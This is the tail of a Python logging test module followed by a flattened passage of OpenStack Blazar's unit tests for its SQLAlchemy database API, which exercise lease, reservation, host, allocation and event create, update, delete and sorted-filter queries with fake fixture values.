os.unlink(fn)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@run_with_locale('LC_ALL', '')
def test_main():
run_unittest(BuiltinLevelsTest, BasicFilterTest,
CustomLevelsAndFiltersTest, MemoryHandlerTest,
ConfigFileTest, SocketHandlerTest, MemoryTest,
EncodingTest, WarningsTest, ConfigDictTest, ManagerTest,
ChildLoggerTest, HandlerTest)
if __name__ == "__main__":
test_main()
|
|
# Copyright (c) 2013 Bull.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import operator
from oslo_utils import uuidutils
from blazar.db import exceptions as db_exceptions
from blazar.db.sqlalchemy import api as db_api
from blazar.db.sqlalchemy import models
from blazar.plugins import oshosts as host_plugin
from blazar import tests
def _get_fake_random_uuid():
return uuidutils.generate_uuid()
def _get_fake_lease_uuid():
"""Returns a fake uuid."""
return 'aaaaaaaa-1111-bbbb-2222-cccccccccccc'
def _get_fake_phys_reservation_values(id=None,
lease_id=_get_fake_lease_uuid(),
resource_id=None):
if id is None:
id = _get_fake_random_uuid()
return {'id': id,
'lease_id': lease_id,
'resource_id': '1234' if not resource_id else resource_id,
'resource_type': host_plugin.RESOURCE_TYPE,
'hypervisor_properties': '[\"=\", \"$hypervisor_type\", \"QEMU\"]',
'resource_properties': '',
'min': 1, 'max': 1,
'trust_id': 'exxee111qwwwwe'}
def _get_fake_event_values(id=None,
lease_id=_get_fake_lease_uuid(),
event_type='fake_event_type',
time=None,
status='fake_event_status'):
if id is None:
id = _get_fake_random_uuid()
return {'id': id,
'lease_id': lease_id,
'event_type': event_type,
'time': _get_datetime('2030-03-01 00:00') if not time else time,
'status': status}
def _get_datetime(value='2030-01-01 00:00'):
return datetime.datetime.strptime(value, '%Y-%m-%d %H:%M')
def _get_fake_phys_lease_values(id=None,
name='fake_phys_lease',
start_date=_get_datetime('2030-01-01 00:00'),
end_date=_get_datetime('2030-01-02 00:00'),
resource_id=None):
if id is None:
id = _get_fake_random_uuid()
return {'id': id,
'name': name,
'user_id': 'fake',
'project_id': 'fake',
'start_date': start_date,
'end_date': end_date,
'trust': 'trust',
'reservations': [_get_fake_phys_reservation_values(
id=_get_fake_random_uuid(),
lease_id=id,
resource_id=resource_id)],
'events': []
}
def _get_fake_host_allocation_values(
id=None,
compute_host_id=_get_fake_random_uuid(),
reservation_id=_get_fake_random_uuid()):
values = {'compute_host_id': compute_host_id,
'reservation_id': reservation_id}
if id is not None:
values.update({'id': id})
return values
def _create_physical_lease(values=_get_fake_phys_lease_values(),
random=False):
"""Creating fake lease having a single physical resource."""
if random is True:
values = _get_fake_phys_lease_values(id=_get_fake_random_uuid(),
name=_get_fake_random_uuid())
lease = db_api.lease_create(values)
phys_res = _get_fake_phys_reservation_values()
for reservation in db_api.reservation_get_all_by_lease_id(lease['id']):
allocation_values = {
'id': _get_fake_random_uuid(),
'compute_host_id': values['reservations'][0]['resource_id'],
'reservation_id': reservation['id']
}
db_api.host_allocation_create(allocation_values)
computehost_reservation = {
'id': _get_fake_random_uuid(),
'reservation_id': values['reservations'][0]['id'],
'resource_properties': phys_res['resource_properties'],
'hypervisor_properties': phys_res['hypervisor_properties'],
'count_range': "{0} - {1}".format(phys_res['min'],
phys_res['max'])
}
db_api.host_reservation_create(computehost_reservation)
return lease
def _get_fake_host_reservation_values(id=None, reservation_id=None):
if id is None:
id = _get_fake_random_uuid()
if reservation_id is None:
reservation_id = _get_fake_random_uuid()
return {'id': id,
'reservation_id': reservation_id,
'resource_properties': "fake",
'hypervisor_properties': "fake",
'min': 1, 'max': 1,
'trust_id': 'exxee111qwwwwe'}
def _get_fake_instance_values(id=None, reservation_id=None):
if id is None:
id = _get_fake_random_uuid()
if reservation_id is None:
reservation_id = _get_fake_random_uuid()
return {'id': id,
'reservation_id': reservation_id,
'vcpus': 1,
'memory_mb': 2024,
'disk_gb': 100,
'amount': 2,
'affinity': False,
'flavor_id': 'fake_flavor_id',
'aggregate_id': 29,
'server_group_id': 'server_group_id'}
def _get_fake_cpu_info():
return str({'vendor': 'Intel',
'model': 'Westmere',
'arch': 'x86_64',
'features': ['rdtscp', 'pdpe1gb', 'hypervisor', 'vmx', 'ss',
'vme'],
'topology': {'cores': 1, 'threads': 1, 'sockets': 2}})
def _get_fake_host_values(id=None, mem=8192, disk=10):
if id is None:
id = _get_fake_random_uuid()
return {'id': id,
'availability_zone': 'az1',
'vcpus': 1,
'cpu_info': _get_fake_cpu_info(),
'hypervisor_type': 'QEMU',
'hypervisor_version': 1000,
'memory_mb': mem,
'local_gb': disk,
'status': 'free',
'trust_id': 'exxee111qwwwwe',
}
def _get_fake_host_extra_capabilities(id=None,
computehost_id=None,
name='vgpu',
value='2'):
if id is None:
id = _get_fake_random_uuid()
if computehost_id is None:
computehost_id = _get_fake_random_uuid()
return {'id': id,
'computehost_id': computehost_id,
'capability_name': name,
'capability_value': value}
def is_result_sorted_correctly(results, sort_key, sort_dir='asc'):
sorted_list = sorted(results,
key=operator.itemgetter(sort_key),
reverse=False if sort_dir == 'asc' else True)
return sorted_list == results
class SQLAlchemyDBApiTestCase(tests.DBTestCase):
"""Test case for SQLAlchemy DB API."""
def setUp(self):
super(SQLAlchemyDBApiTestCase, self).setUp()
def test_model_query(self):
lease = db_api.lease_create(_get_fake_phys_lease_values())
query = db_api.model_query(models.Lease)
self.assertEqual([lease.to_dict()], [l.to_dict() for l in query.all()])
def test_create_phys_lease(self):
"""Check physical lease create
Create a physical lease and verify that all tables have been
populated.
"""
result = db_api.lease_create(_get_fake_phys_lease_values())
self.assertEqual(result['name'],
_get_fake_phys_lease_values()['name'])
self.assertEqual(0, len(db_api.event_get_all()))
self.assertEqual(1, len(db_api.reservation_get_all()))
def test_create_duplicate_leases(self):
"""Create two leases with same ids, and checks it raises an error."""
db_api.lease_create(_get_fake_phys_lease_values(id='42'))
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.lease_create,
_get_fake_phys_lease_values(id='42'))
def test_create_leases_with_duplicated_reservation(self):
"""Check duplicated reservation create
Create two leases with a duplicated reservation,
and checks it raises an error.
"""
lease_values = _get_fake_phys_lease_values()
db_api.lease_create(lease_values)
lease_values['id'] = _get_fake_random_uuid()
lease_values['name'] = 'duplicated_reservation'
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.lease_create,
lease_values)
def test_create_leases_with_duplicated_event(self):
"""Check duplicated event create
Create two leases with a duplicated event,
and checks it raises an error.
"""
lease_values = _get_fake_phys_lease_values()
lease_values['events'] = [_get_fake_event_values()]
db_api.lease_create(lease_values)
lease_values['id'] = _get_fake_random_uuid()
lease_values['name'] = 'duplicated_event'
lease_values['reservations'][0]['id'] = _get_fake_random_uuid()
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.lease_create,
lease_values)
def test_create_lease_with_event(self):
"""Create a lease including a fake event and check all tables."""
lease = _get_fake_phys_lease_values()
lease['events'].append(_get_fake_event_values(lease_id=lease['id']))
result = db_api.lease_create(lease)
self.assertEqual(result['name'],
_get_fake_phys_lease_values()['name'])
self.assertEqual(1, len(db_api.event_get_all()))
def test_delete_wrong_lease(self):
"""Delete a lease that doesn't exist and check that raises an error."""
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.lease_destroy, 'fake_id')
def test_get_physical_lease(self):
"""Test if physical host reservation contains data of reservation."""
lease = _get_fake_phys_lease_values()
lease['events'].append(_get_fake_event_values(lease_id=lease['id']))
result = _create_physical_lease(values=lease)
result = db_api.lease_get(result['id'])
res = result.to_dict()
self.assertEqual(res['reservations'][0]['hypervisor_properties'],
lease['reservations'][0]['hypervisor_properties'])
self.assertEqual(res['reservations'][0]['resource_properties'],
lease['reservations'][0]['resource_properties'])
self.assertEqual(res['reservations'][0]['min'],
lease['reservations'][0]['min'])
self.assertEqual(res['reservations'][0]['max'],
lease['reservations'][0]['max'])
def test_delete_correct_lease(self):
"""Delete a lease and check that deletion has been cascaded to FKs."""
lease = _get_fake_phys_lease_values()
lease['events'].append(_get_fake_event_values(lease_id=lease['id']))
result = _create_physical_lease(values=lease)
db_api.lease_destroy(result['id'])
self.assertIsNone(db_api.lease_get(result['id']))
self.assertEqual(0, len(db_api.reservation_get_all()))
self.assertEqual(0, len(db_api.event_get_all()))
def test_lease_get_all(self):
"""Check the number of leases we get."""
_create_physical_lease(random=True)
self.assertEqual(1, len(db_api.lease_get_all()))
_create_physical_lease(random=True)
self.assertEqual(2, len(db_api.lease_get_all()))
def test_lease_list(self):
"""Not implemented yet until lease_list returns list of IDs."""
# TODO(sbauza): Enable this test when lease_list will return only IDs
self.assertTrue(True)
return
_create_physical_lease(
values=_get_fake_phys_lease_values(id='1', name='fake1'))
_create_physical_lease(
values=_get_fake_phys_lease_values(id='2', name='fake2'))
self.assertEqual(['1', '2'], db_api.lease_list())
def test_lease_update(self):
"""Update both start_time and name and check lease has been updated."""
result = _create_physical_lease()
result = db_api.lease_update(result['id'],
values={'name': 'lease_renamed'})
self.assertEqual('lease_renamed', result['name'])
result = db_api.lease_update(
result['id'],
values={'start_date': _get_datetime('2014-02-01 00:00')})
self.assertEqual(_get_datetime('2014-02-01 00:00'),
result['start_date'])
# Reservations
def test_create_reservation(self):
"""Create and verify reservation
Create a reservation and verify that all tables have been
populated.
"""
result = db_api.reservation_create(_get_fake_phys_reservation_values())
self.assertEqual(result['lease_id'],
_get_fake_phys_reservation_values()
['lease_id'])
def test_reservation_get_all_by_values(self):
"""Create 2 reservations and check find abilities
Create two reservations and verify that we can find reservation per
resource_id or resource_type.
"""
db_api.reservation_create(
_get_fake_phys_reservation_values(id='1', resource_id='1234'))
db_api.reservation_create(
_get_fake_phys_reservation_values(id='2', resource_id='5678'))
self.assertEqual(2, len(db_api.reservation_get_all_by_values()))
self.assertEqual(1, len(db_api.reservation_get_all_by_values(
resource_id='5678')))
self.assertEqual(2, len(db_api.reservation_get_all_by_values(
resource_type=host_plugin.RESOURCE_TYPE)))
def test_reservation_update(self):
result = db_api.reservation_create(_get_fake_phys_reservation_values())
self.assertNotEqual('fake', result.resource_type)
result = db_api.reservation_update(result.id,
{"resource_type": 'fake'})
self.assertEqual('fake', result.resource_type)
def test_reservation_destroy_for_reservation_not_found(self):
self.assertFalse(db_api.reservation_get('1'))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.reservation_destroy, '1')
def test_create_duplicate_reservation(self):
"""Create duplicated reservation
Create a reservation and verify that an exception is raised if a
duplicated reservation is created.
"""
uuid = _get_fake_random_uuid()
db_api.reservation_create(_get_fake_phys_reservation_values(id=uuid))
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.reservation_create,
_get_fake_phys_reservation_values(id=uuid))
# Host reservations
def test_create_host_reservation(self):
"""Create host reservation
Create a host reservation and verify that all tables
have been populated.
"""
result = db_api.host_reservation_create(
_get_fake_host_reservation_values(id='1'))
self.assertEqual(result['id'],
_get_fake_host_reservation_values(id='1')
['id'])
def test_create_duplicate_host_reservation(self):
"""Create duplicated host reservation
Create a duplicated host reservation and verify that an exception is
raised.
"""
db_api.host_reservation_create(
_get_fake_host_reservation_values(id='1'))
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.host_reservation_create,
_get_fake_host_reservation_values(id='1'))
def test_delete_host_reservation(self):
"""Check deletion for host reservation
Check all deletion cases for host reservation,
including cascade deletion from reservations table.
"""
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_reservation_destroy, 'fake_id')
result = db_api.host_reservation_create(
_get_fake_host_reservation_values())
db_api.host_reservation_destroy(result['id'])
self.assertIsNone(db_api.host_reservation_get(result['id']))
reserv = db_api.reservation_create(_get_fake_phys_reservation_values())
result = db_api.host_reservation_create(
_get_fake_host_reservation_values(reservation_id=reserv['id']))
db_api.reservation_destroy(reserv['id'])
self.assertIsNone(db_api.host_reservation_get(result['id']))
def test_host_reservation_get_all(self):
"""Check that we return 2 hosts."""
db_api.host_reservation_create(_get_fake_host_reservation_values(id=1))
db_api.host_reservation_create(_get_fake_host_reservation_values(id=2))
hosts_reservations = db_api.host_reservation_get_all()
self.assertEqual(['1', '2'], [x['id'] for x in hosts_reservations])
def test_host_reservation_get_by_reservation_id(self):
"""Check that we return 2 hosts."""
db_api.host_reservation_create(
_get_fake_host_reservation_values(id=1, reservation_id=1))
db_api.host_reservation_create(
_get_fake_host_reservation_values(id=2, reservation_id=2))
res = db_api.host_reservation_get_by_reservation_id(2)
self.assertEqual('2', res['id'])
def test_update_host_reservation(self):
db_api.host_reservation_create(_get_fake_host_reservation_values(id=1))
db_api.host_reservation_update(1, {'resource_properties': 'updated'})
res = db_api.host_reservation_get(1)
self.assertEqual('updated', res['resource_properties'])
def test_create_host(self):
"""Create a host and verify that all tables have been populated."""
result = db_api.host_create(_get_fake_host_values(id='1'))
self.assertEqual(result['id'], _get_fake_host_values(id='1')['id'])
def test_create_duplicated_host(self):
"""Create a duplicated host and verify that an exception is raised."""
db_api.host_create(_get_fake_host_values(id='1'))
# Making sure we still raise a DuplicateDBEntry
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.host_create,
_get_fake_host_values(id='1'))
def test_search_for_hosts_by_ram(self):
"""Check RAM info search
Create two hosts and check that we can find a host per its RAM
info.
"""
db_api.host_create(_get_fake_host_values(id=1, mem=2048))
db_api.host_create(_get_fake_host_values(id=2, mem=4096))
self.assertEqual(2, len(
db_api.host_get_all_by_queries(['memory_mb >= 2048'])))
self.assertEqual(0, len(
db_api.host_get_all_by_queries(['memory_mb lt 2048'])))
def test_search_for_hosts_by_cpu_info(self):
"""Create one host and search within cpu_info."""
db_api.host_create(_get_fake_host_values())
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['cpu_info like %Westmere%'])))
def test_search_for_hosts_by_extra_capability(self):
"""Create one host and test extra capability queries."""
# We create a first host, with extra capabilities
db_api.host_create(_get_fake_host_values(id=1))
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(computehost_id=1))
db_api.host_extra_capability_create(_get_fake_host_extra_capabilities(
computehost_id=1,
name='nic_model',
value='ACME Model A',
))
# We create a second host, without any extra capabilities
db_api.host_create(_get_fake_host_values(id=2))
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['vgpu == 2'])))
self.assertEqual(0, len(
db_api.host_get_all_by_queries(['vgpu != 2'])))
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['cpu_info like %Westmere%',
'vgpu == 2'])))
self.assertEqual(0, len(
db_api.host_get_all_by_queries(['cpu_info like %wrongcpu%',
'vgpu == 2'])))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_get_all_by_queries, ['apples < 2048'])
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['nic_model == ACME Model A'])
))
def test_search_for_hosts_by_composed_queries(self):
"""Create one host and test composed queries."""
db_api.host_create(_get_fake_host_values(mem=8192))
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['memory_mb > 2048',
'cpu_info like %Westmere%'])))
self.assertEqual(0, len(
db_api.host_get_all_by_queries(['memory_mb < 2048',
'cpu_info like %Westmere%'])))
self.assertRaises(db_exceptions.BlazarDBInvalidFilter,
db_api.host_get_all_by_queries, ['memory_mb <'])
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_get_all_by_queries, ['apples < 2048'])
self.assertRaises(db_exceptions.BlazarDBInvalidFilterOperator,
db_api.host_get_all_by_queries,
['memory_mb wrongop 2048'])
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['memory_mb in 4096,8192'])))
self.assertEqual(1, len(
db_api.host_get_all_by_queries(['memory_mb != null'])))
def test_list_hosts(self):
db_api.host_create(_get_fake_host_values(id=1))
db_api.host_create(_get_fake_host_values(id=2))
self.assertEqual(2, len(db_api.host_list()))
def test_get_hosts_per_filter(self):
db_api.host_create(_get_fake_host_values(id=1))
db_api.host_create(_get_fake_host_values(id=2))
filters = {'status': 'free'}
self.assertEqual(2, len(
db_api.host_get_all_by_filters(filters)))
def test_update_host(self):
db_api.host_create(_get_fake_host_values(id=1))
db_api.host_update(1, {'status': 'updated'})
self.assertEqual('updated', db_api.host_get(1)['status'])
def test_delete_host(self):
db_api.host_create(_get_fake_host_values(id=1))
db_api.host_destroy(1)
self.assertIsNone(db_api.host_get(1))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_destroy, 2)
def test_create_host_extra_capability(self):
result = db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id=1))
self.assertEqual(result['id'], _get_fake_host_values(id='1')['id'])
def test_create_duplicated_host_extra_capability(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id=1))
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.host_extra_capability_create,
_get_fake_host_extra_capabilities(id='1'))
def test_get_host_extra_capability_per_id(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='1'))
result = db_api.host_extra_capability_get('1')
self.assertEqual('1', result['id'])
def test_host_extra_capability_get_all_per_host(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='1', computehost_id='1'))
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='2', computehost_id='1'))
res = db_api.host_extra_capability_get_all_per_host('1')
self.assertEqual(2, len(res))
def test_update_host_extra_capability(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='1'))
db_api.host_extra_capability_update('1', {'capability_value': '2'})
res = db_api.host_extra_capability_get('1')
self.assertEqual('2', res['capability_value'])
def test_delete_host_extra_capability(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='1'))
db_api.host_extra_capability_destroy('1')
self.assertIsNone(db_api.host_extra_capability_get('1'))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_extra_capability_destroy, '1')
def test_host_extra_capability_get_all_per_name(self):
db_api.host_extra_capability_create(
_get_fake_host_extra_capabilities(id='1', computehost_id='1'))
res = db_api.host_extra_capability_get_all_per_name('1', 'vgpu')
self.assertEqual(1, len(res))
self.assertEqual([],
db_api.host_extra_capability_get_all_per_name('1',
'bad'))
# Instance reservation
def check_instance_reservation_values(self, expected, reservation_id):
inst_reservation = db_api.instance_reservation_get(reservation_id)
for k, v in expected.items():
self.assertEqual(v, inst_reservation[k])
def test_instance_reservation_create(self):
reservation_values = _get_fake_instance_values(id='1')
ret = db_api.instance_reservation_create(reservation_values)
self.assertEqual('1', ret['id'])
self.check_instance_reservation_values(reservation_values, '1')
def test_create_duplicated_instance_reservation(self):
reservation_values = _get_fake_instance_values(id='1')
db_api.instance_reservation_create(reservation_values)
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.instance_reservation_create,
reservation_values)
def test_instance_reservation_get(self):
reservation1_values = _get_fake_instance_values(id='1')
db_api.instance_reservation_create(reservation1_values)
reservation2_values = _get_fake_instance_values(id='2')
db_api.instance_reservation_create(reservation2_values)
self.check_instance_reservation_values(reservation1_values, '1')
self.check_instance_reservation_values(reservation2_values, '2')
def test_instance_reservation_update(self):
reservation_values = _get_fake_instance_values(id='1')
db_api.instance_reservation_create(reservation_values)
self.check_instance_reservation_values(reservation_values, '1')
updated_values = {
'flavor_id': 'updated-flavor-id',
'aggregate_id': 30,
'server_group_id': 'updated-server-group-id'
}
db_api.instance_reservation_update('1', updated_values)
reservation_values.update(updated_values)
self.check_instance_reservation_values(reservation_values, '1')
def test_update_non_existing_instance_reservation(self):
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.instance_reservation_destroy, 'non-exists')
def test_instance_reservation_destroy(self):
reservation_values = _get_fake_instance_values(id='1')
db_api.instance_reservation_create(reservation_values)
self.check_instance_reservation_values(reservation_values, '1')
db_api.instance_reservation_destroy('1')
self.assertIsNone(db_api.instance_reservation_get('1'))
def test_destroy_non_existing_instance_reservation(self):
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.instance_reservation_destroy, 'non-exists')
# Host allocations
def test_host_allocation_get_all(self):
self.assertFalse(db_api.host_allocation_get_all())
db_api.host_allocation_create(_get_fake_host_allocation_values(id='1'))
db_api.host_allocation_create(_get_fake_host_allocation_values(id='2'))
self.assertEqual(2, len(db_api.host_allocation_get_all()))
def test_host_allocation_create_for_duplicated_hosts(self):
db_api.host_allocation_create(
_get_fake_host_allocation_values(id='1')
)
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.host_allocation_create,
_get_fake_host_allocation_values(id='1'))
def test_host_allocation_update_for_host(self):
host_allocation = db_api.host_allocation_create(
_get_fake_host_allocation_values(
compute_host_id="1",
reservation_id="1"
))
new_host_allocation = db_api.host_allocation_update(
host_allocation.id,
_get_fake_host_allocation_values(
compute_host_id="2",
reservation_id="2"
))
self.assertEqual('2', new_host_allocation.compute_host_id)
self.assertEqual('2', new_host_allocation.reservation_id)
self.assertNotEqual(host_allocation.compute_host_id,
new_host_allocation.compute_host_id)
def test_host_allocation_destroy_for_host(self):
host_allocation = db_api.host_allocation_create(
_get_fake_host_allocation_values()
)
db_api.host_allocation_destroy(host_allocation.id)
self.assertIsNone(db_api.host_allocation_get(host_allocation.id))
def test_host_allocation_destroy_for_host_not_found(self):
host_allocation_id = _get_fake_random_uuid()
self.assertIsNone(db_api.host_allocation_get(host_allocation_id))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.host_allocation_destroy,
host_allocation_id)
def test_host_allocation_get_all_by_values(self):
db_api.host_allocation_create(_get_fake_host_allocation_values(
compute_host_id="1", reservation_id="1"))
db_api.host_allocation_create(_get_fake_host_allocation_values(
compute_host_id="1", reservation_id="1234"))
self.assertEqual(2, len(db_api.host_allocation_get_all_by_values()))
self.assertEqual(1, len(db_api.host_allocation_get_all_by_values(
reservation_id='1234')))
# Event
def test_event_create(self):
fake_event_type = 'test_event'
test_event = db_api.event_create(_get_fake_event_values(
event_type=fake_event_type))
self.assertTrue(test_event)
self.assertEqual(fake_event_type, test_event.event_type)
def test_create_duplicated_event(self):
self.assertFalse(db_api.event_get('1'))
fake_values = _get_fake_event_values(id='1')
test_event = db_api.event_create(fake_values)
self.assertTrue(test_event)
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.event_create, fake_values)
def test_event_update(self):
self.assertFalse(db_api.event_get('1'))
test_event = db_api.event_create(_get_fake_event_values(id='1'))
self.assertTrue(test_event)
test_event = db_api.event_update(test_event.id, {'status': 'changed'})
self.assertEqual('changed', test_event.status)
def test_event_destroy(self):
self.assertFalse(db_api.event_get('1'))
db_api.event_create(_get_fake_event_values(
id='1'))
self.assertTrue(db_api.event_get('1'))
db_api.event_destroy('1')
self.assertFalse(db_api.event_get('1'))
def test_destroy_for_event_not_found(self):
self.assertFalse(db_api.event_get('1'))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.event_destroy, '1')
def test_event_get_first_sorted_by_event_type_filter(self):
fake_event_type = 'test_event'
db_api.event_create(_get_fake_event_values(
id='1'
))
db_api.event_create(_get_fake_event_values(
id='2',
event_type=fake_event_type
))
db_api.event_create(_get_fake_event_values(
id='3',
event_type=fake_event_type
))
filtered_events = db_api.event_get_first_sorted_by_filters(
sort_key='time',
sort_dir='asc',
filters={'event_type': fake_event_type}
)
self.assertEqual(fake_event_type, filtered_events.event_type)
self.assertEqual('2', filtered_events.id)
def test_event_get_first_sorted_by_status_filter(self):
fake_status = 'test_status'
db_api.event_create(_get_fake_event_values(
id='1'
))
db_api.event_create(_get_fake_event_values(
id='2',
status=fake_status
))
db_api.event_create(_get_fake_event_values(
id='3',
status=fake_status
))
filtered_events = db_api.event_get_first_sorted_by_filters(
sort_key='time',
sort_dir='asc',
filters={'status': fake_status}
)
self.assertEqual(fake_status, filtered_events.status)
self.assertEqual('2', filtered_events.id)
def test_event_get_first_sorted_by_lease_id_filter(self):
fake_lease_id = '1234'
db_api.event_create(_get_fake_event_values(
id='1'
))
db_api.event_create(_get_fake_event_values(
id='2',
lease_id=fake_lease_id
))
db_api.event_create(_get_fake_event_values(
id='3',
lease_id=fake_lease_id
))
filtered_events = db_api.event_get_first_sorted_by_filters(
sort_key='time',
sort_dir='asc',
filters={'lease_id': fake_lease_id}
)
self.assertEqual(fake_lease_id, filtered_events.lease_id)
self.assertEqual('2', filtered_events.id)
def test_event_get_sorted_asc_by_event_type_filter(self):
fake_event_type = 'test_event'
sort_dir = 'asc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
event_type=fake_event_type,
time=datetime.datetime.utcnow()
))
db_api.event_create(_get_fake_event_values(
id='2',
event_type=fake_event_type,
time=datetime.datetime.utcnow()
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'event_type': fake_event_type}
)
self.assertEqual(2, len(filtered_events))
self.assertEqual(fake_event_type, filtered_events[0].event_type)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_asc_by_status_filter(self):
fake_status = 'test_status'
sort_dir = 'asc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
status=fake_status
))
db_api.event_create(_get_fake_event_values(
id='2'
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'status': fake_status}
)
self.assertEqual(1, len(filtered_events))
self.assertEqual(fake_status, filtered_events[0].status)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_asc_by_lease_id_filter(self):
fake_lease_id = '1234'
sort_dir = 'asc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
lease_id=fake_lease_id
))
db_api.event_create(_get_fake_event_values(
id='2'
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'lease_id': fake_lease_id}
)
self.assertEqual(1, len(filtered_events))
self.assertEqual(fake_lease_id, filtered_events[0].lease_id)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_asc_by_time_filter(self):
def check_query(border, op, expected_ids):
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'time': {'border': _get_datetime(border),
'op': op}})
filtered_event_ids = [e.id for e in filtered_events]
self.assertListEqual(expected_ids, filtered_event_ids)
time1 = _get_datetime('2030-01-01 01:00')
time2 = _get_datetime('2030-01-01 02:00')
time3 = _get_datetime('2030-01-01 03:00')
sort_key = 'time'
sort_dir = 'asc'
db_api.event_create(_get_fake_event_values(id='1', time=time1))
db_api.event_create(_get_fake_event_values(id='2', time=time2))
db_api.event_create(_get_fake_event_values(id='3', time=time3))
check_query('2030-01-01 02:00', 'lt', ['1'])
check_query('2030-01-01 02:00', 'le', ['1', '2'])
check_query('2030-01-01 02:00', 'gt', ['3'])
check_query('2030-01-01 02:00', 'ge', ['2', '3'])
check_query('2030-01-01 02:00', 'eq', ['2'])
def test_event_get_sorted_desc_by_event_type_filter(self):
fake_event_type = 'test_event'
sort_dir = 'desc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
event_type=fake_event_type
))
db_api.event_create(_get_fake_event_values(
id='2',
event_type=fake_event_type
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'event_type': fake_event_type}
)
self.assertEqual(2, len(filtered_events))
self.assertEqual(fake_event_type, filtered_events[0].event_type)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_desc_by_status_filter(self):
fake_status = 'test_status'
sort_dir = 'desc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
status=fake_status
))
db_api.event_create(_get_fake_event_values(
id='2'
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'status': fake_status}
)
self.assertEqual(1, len(filtered_events))
self.assertEqual(fake_status, filtered_events[0].status)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_desc_by_lease_id_filter(self):
fake_lease_id = '1234'
sort_dir = 'desc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
lease_id=fake_lease_id
))
db_api.event_create(_get_fake_event_values(
id='2'
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'lease_id': fake_lease_id}
)
self.assertEqual(1, len(filtered_events))
self.assertEqual(fake_lease_id, filtered_events[0].lease_id)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_desc_by_time_filter(self):
def check_query(border, op, expected_ids):
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'time': {'border': _get_datetime(border),
'op': op}})
filtered_event_ids = [e.id for e in filtered_events]
self.assertListEqual(expected_ids, filtered_event_ids)
time1 = _get_datetime('2030-01-01 01:00')
time2 = _get_datetime('2030-01-01 02:00')
time3 = _get_datetime('2030-01-01 03:00')
sort_key = 'time'
sort_dir = 'desc'
db_api.event_create(_get_fake_event_values(id='1', time=time1))
